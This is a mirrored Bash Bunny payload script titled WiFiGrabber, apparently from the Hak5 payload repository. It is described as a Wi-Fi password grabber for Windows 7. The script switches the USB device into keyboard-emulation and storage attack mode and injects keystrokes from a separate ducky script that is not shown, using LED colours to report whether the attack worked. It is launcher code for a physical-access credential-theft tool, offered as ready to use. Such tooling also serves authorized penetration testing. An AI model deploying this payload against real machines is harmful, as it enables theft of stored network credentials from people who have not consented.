mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
32 lines
873 B
Bash
Executable File
32 lines
873 B
Bash
Executable File
#!/bin/bash
|
|
|
|
# Title: WiFiGrabber
|
|
# Author: Silvian Dragan
|
|
# Props: Siem, Darren Kitchen
|
|
# Version: 1.0
|
|
# Target: Windows 7
|
|
# Description: This is a simple Wifi password grabber tested and working for Windows 7
|
|
# However this has not been tested on Windows 8 and above and any suggestions and
|
|
# improvements are greatly welcomed. Powershell scripting isn't higest skill so
|
|
# I'm sure I'll have much to learn.
|
|
#
|
|
# LEDS:
|
|
# Purple: starts the attack payload
|
|
# Green: successful execution
|
|
# Red: failure to load dependency ducky script
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
|
|
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
|
|
QUACK ${SWITCH_POSITION}/ducky_script.txt
|
|
LED FINISH
|
|
else
|
|
LED FAIL
|
|
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
|
|
exit 1
|
|
fi
|